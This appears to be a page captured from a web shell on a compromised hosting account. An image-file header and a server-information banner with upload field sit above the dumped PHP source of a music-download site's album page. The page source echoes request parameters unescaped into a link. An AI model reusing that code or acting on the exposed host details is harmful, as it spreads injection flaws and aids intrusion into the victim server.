����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 18.191.91.15 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/malawisounds.com/ |
Upload File : |
<?php include 'connect.php'; if (isset($_GET['title'], $_GET['artist'], $_GET['time'])) { $title = mysqli_real_escape_string($conn, htmlentities(str_replace('-', ' ', $_GET['title']))); $artist = mysqli_real_escape_string($conn, htmlentities(str_replace('-', ' ', $_GET['artist']))); $date = mysqli_real_escape_string($conn, htmlentities(str_replace('-', ' ', $_GET['time']))); $current = time(); $added = $date - $current; $hours = floor($added / 3600); //converting seconds to hours then finding LCM $minutes = floor(((($added / 3600) - floor($added / 3600)) / 1) * 60); //extracting decimal,dividing by 1, multiplying by 60 finally taking LCM $seconds = floor(((($added / 60) - floor($added / 60)) / 1) * 60); //extracting decimal,dividing by 1 and multiplying by 60 if (!empty($title) && !empty($artist) && !empty($date)) { //checking if added time is greater than current time if ($date >= $current) { //checking if hours exceeds 6 hours if ($hours <= 3) { $query1 = "SELECT * FROM `ulbum_music` WHERE `title`='$title' AND `artist`='$artist'"; $query2 = "SELECT `image`,`genre`,`type`,`mode`,`price` FROM `ulbum` WHERE `title`='$title' AND `artist`='$artist'"; if ($query_run1 = mysqli_query($conn, $query1)) { if ($query_run2 = mysqli_query($conn, $query2)) { list($image, $genre, $type, $mode, $price) = mysqli_fetch_array($query_run2); $artisturl = str_replace(' ', '-', strtolower($artist)); $titleurl = str_replace(' ', '-', strtolower($title)); if (mysqli_num_rows($query_run1) > 0) { } } else { die(mysqli_error($conn)); } } else { die(mysqli_error($conn)); } } else { die(" <html> <head> <title>LINK EXPIRED</title> <meta name=\"viewport\" content=\"width=device-width,initial-scale=1.0\"> <meta charset=\"UTF-8\"> <link rel=\"shortcut icon\" href=\"Icons/malawisounds.ico\"> </head> <body style=\"background-image:url(./Icons/404.jpg);width:100%;height:100%;background-size:cover;background-position:center center;;background-repeatno-repeat\"> <h3 style=\"font-size:25px;font-family:arial;color:red;min-height;position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);\"><center>OOPS! <br>LINK HAS EXPIRED</center></h3> </body> </html> "); } } else { die(" <html> <head> <title>LINK EXPIRED</title> <meta name=\"viewport\" content=\"width=device-width,initial-scale=1.0\"> <meta charset=\"UTF-8\"> <link rel=\"shortcut icon\" href=\"Icons/malawisounds.ico\"> </head> <body style=\"background-image:url(./Icons/404.jpg);width:100%;height:100%;background-size:cover;background-position:center center;;background-repeatno-repeat\"> <h3 style=\"font-size:25px;font-family:arial;color:red;min-height;position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);\"><center>OOPS! <br>LINK HAS EXPIRED</center></h3> </body> </html> "); } } else { ?> <script type="text/javascript"> alert('Incomplete') </script> <?php } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,initial-scale=1.0"> <link rel="stylesheet" type="text/css" href="./css/w3.css"> <link rel="stylesheet" type="text/css" href="./css/load.css"> <link rel="stylesheet" type="text/css" href="./css/css/fontawesome/all.min.css" /> <link rel="icon" type="x-icon" href="Icons/malawisounds.ico"> <link rel="stylesheet" type="text/css" href="bootstrap/css/bootstrap.min.css"> <script type="text/javascript" src="./js/ajax.js"></script> <script type="text/javascript" src="./js/jquery.js"></script> <script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#property=5b67c4f0f3815e0011ed2735&product=inline-share-buttons' async='async'></script> <title><?php echo "$title by $artist [$type]"; ?></title> <!--og codes--> <meta property="og:url" content="https://malawisounds.com/<?php echo "$type=$titleurl-by-$artisturl-$date"; ?>" /> <meta property="og:type" content="website" /> <meta property="og:title" content="<?php echo "Download $title by $artist"; ?>" /> <meta property="og:image" content="https://malawisounds.com/album_images/<?php echo $image; ?>" /> <meta property="og:description" content="<?php echo strtoupper($type); ?>" /> <meta property="fb:app_id" content="197362031139140" /> </head> <body> <!-- FaceBook API --> <div id="fb-root"></div> <script type="text/javascript" src="js/facebook-api.js"></script> <div class="margin"> <header> <!-- malawisounds logo --> <img src="Icons/msounds1.png" alt="logo" class="msounds"> <!-- social media links --> <div class="link"> <a href="https://www.facebook.com/Malawi-Sounds-303591487173877/"><img src="Icons/facebook.png" alt="facebook"></a> <a href="https://www.instagram.com/malawi_sounds"><img src="Icons/instagram.png" alt="instagram"></a> <a href="#"><img src="Icons/twitter.png" alt="twitter"></a> </div> </header> <!-- Navigation Bar --> <nav> <ul> <li><a href="home" target="_parent">HOME</a></li> <li><a href="singles" target="_parent">SINGLES</a></li> <li><a href="biography" target="_parent">ARTISTS</a></li> <li><a href="albums" target="_parent">ALBUMS</a></li> <li><a href="e-news" target="_parent">NEWS</a></li> <li><a href="videos" target="_parent">VIDEOS</a></li> <li><a href="oldies" target="_parent">OLDIES</a></li> <li><span class="search glyphicon glyphicon-search"></span></li> </ul> </nav> <!--Search bar--> <input type="text" id="search" placeholder=" SEARCH-MUSIC, ARTISTS" onkeyup="findmatch(this.value)" class="glyphicon glyphicon-search"> <!--search results goes here--> <div id="results" class="w3-container w3-light-grey"></div> <!-- End of nav Bar --> <?php /////////////////////////////////////////////////////////ARTISTS///////////////////////////////////////////// //query for selecting artists $sql1 = "SELECT * FROM `biography` WHERE `trending`=1 ORDER BY `id` DESC"; if ($query_run = mysqli_query($conn, $sql1)) { echo "<div class=\"artist_table\">"; echo "<center class=\"w3-display-container\">"; echo "<table>"; echo "<tr>"; while ($row = mysqli_fetch_array($query_run)) { $path = $row['path']; $name = $row['artist_name']; $id = $row['id']; ?> <td> <a href="artist=<?php echo str_replace(' ', '-', $name); ?>" target="_parent"> <img src="bio/<?php echo $path; ?>" alt="artist" /> </a> </td> <?php } echo "</tr>"; echo "</table>"; echo "</center>"; echo "</div>"; } else { die(mysqli_error($conn)); } //////////////////////////////////////////////////////ALBUM SONGS///////////////////////////////////////////// //printing expire date ?> <div class="album-cover container-fluid"> <div class="row"> <div class="col-xs-4 col-sm-4"> <img src="album_images/<?php echo $image; ?>" alt="<?php echo $artist; ?>"> </div> <div class="col-xs-8 col-sm-8"> <h2 class="text-anime"><?php echo strtoupper($title); ?></h2> <h4><?php echo strtoupper($artist); ?></h4> <h5><i class="glyphicon glyphicon-headphones"></i> <?php echo strtoupper($genre) ?></h5> </div> </div> </div> <!-- displaying time --> <div class="expires"> <table> <tr> <th>Hrs</th> <th>Min</th> <th>Sec</th> </tr> <tr> <td><?php echo $hours; ?></td> <td><?php echo $minutes; ?></td> <td><?php echo $seconds; ?></td> </tr> </table> </div> <div class="album-content container-fluid"> <div class="row"> <?php //creating counter and initializing to 0 $count = 1; if (mysqli_num_rows($query_run1) > 0) { while ($row = mysqli_fetch_array($query_run1)) { $id = $row['id']; $downloads = $row['downloads']; $streamed = $row['listened']; $size = $row['size']; $album_path = 'album_songs/' . $row['music']; $music_title = $row['music_title']; $music_titleurl = str_replace(' ', '-', strtolower($row['music_title'])); ?> <div class="col-lg-12 wow fadeInUp" data-wow-delay="0.5s" id="make_see<?php echo $id; ?>"> <div class="song"> <h5><?php echo $count . '. ' . $music_title; ?></h5> <div class="options"> <a href="<?php echo "aid-$id-$type-stream-$music_titleurl"; ?>" class="album-play" target="_parent"> <i class="fa fa-play"></i> </a> <a href="download_album.php?id=<?php echo $id; ?>" class="album-download"> <i class="fa fa-download"></i> </a> <a href="#" class="album-more" data-toggle="modal" data-target="#modal-<?php echo $id; ?>"> <i class="fas fa-ellipsis-v"></i> </a> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="modal-<?php echo $id; ?>" role="dialog"> <div class="modal-dialog modal-sm"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal">×</button> <h4 class="modal-title"><?php echo $music_title; ?></h4> </div> <div class="modal-body"> <div><i class="fas fa-download"></i> Downloads: <?php echo $downloads; ?></div> <div><i class="fas fa-headphones"></i> Streams: <?php echo $streamed; ?></div> <div><i class="fas fa-file"></i> Size: <?php echo $size . ' mb'; ?></div> </div> <div class="modal-footer"> <button type="button" class="btn btn-default" data-dismiss="modal">Close</button> </div> </div> </div> </div> <?php $count++; ?> <?php } } else { echo "<div class=\"danger\">No song was added on this $type</div>"; } ?> </div> </div> <!--Download Zip --> <center> <a href="album-zip.php?title=<?php echo $_GET['title']; ?>&name=<?php echo $_GET['artist']; ?>" class="download-zip">Download Zip <span class="far fa-file-archive"></span></a> </center> <!--Facebook like button--> <div style="overflow-x:auto;margin-top:12px;"> <div class="fb-like" data-href="https://facebook.com/Malawi-Sounds-303591487173877/?_e_pi_=7%2CPAGE_ID10%2C3127301386" data-layout="standard" data-action="like" data-size="small" data-show-faces="true" data-share="true"></div> </div> <!-- share button --> <div class="sharethis-inline-share-buttons"></div> <?php /////////////////////////////////////////////////////////////ADVERT///////////////////////////////////////////// //query for selecting adverts from db $sql3 = "SELECT aid,ads_name FROM `ads` ORDER BY `aid` DESC"; if ($query_run = mysqli_query($conn, $sql3)) { list($id, $imagepath) = mysqli_fetch_array($query_run); echo "<div style=\"overflow-x:auto;background-color:#b7b7b7;\" class=\"merchandise\">"; echo "<table>"; echo "<tr>"; ?> <td> <center><img src="ads/<?php echo $imagepath; ?>" alt="advert" /></center> </td> <?php echo "</tr>"; echo "</table>"; echo "</div>"; } else { die(mysqli_error($conn)); } ?> <!--Footer--> <?php include './footer.php'; ?> </div> </body> </html> <script type="text/javascript" src="js/jquery-3.3.1.min.js"></script> <script type="text/javascript" src="js/jquery.form.min.js"></script> <script src="./js/wow.js"></script> <script src="js/custom-file-input.js"></script> <script src="js/all.min.js"></script> <script src="./bootstrap/js/bootstrap.min.js"></script> <script type="text/javascript" src="js/nav.js"></script> <script> /* Animated Wow Js */ new WOW().init(); </script> <script type="text/javascript"> function _(selector) { return document.querySelectorAll(selector); } _("ul li a")[3].style.backgroundColor = "#3f4243"; _("ul li a")[3].style.Color = "white"; function splash(id) { id = 'ad' + id; document.getElementById(id).style.display = "block"; } </script>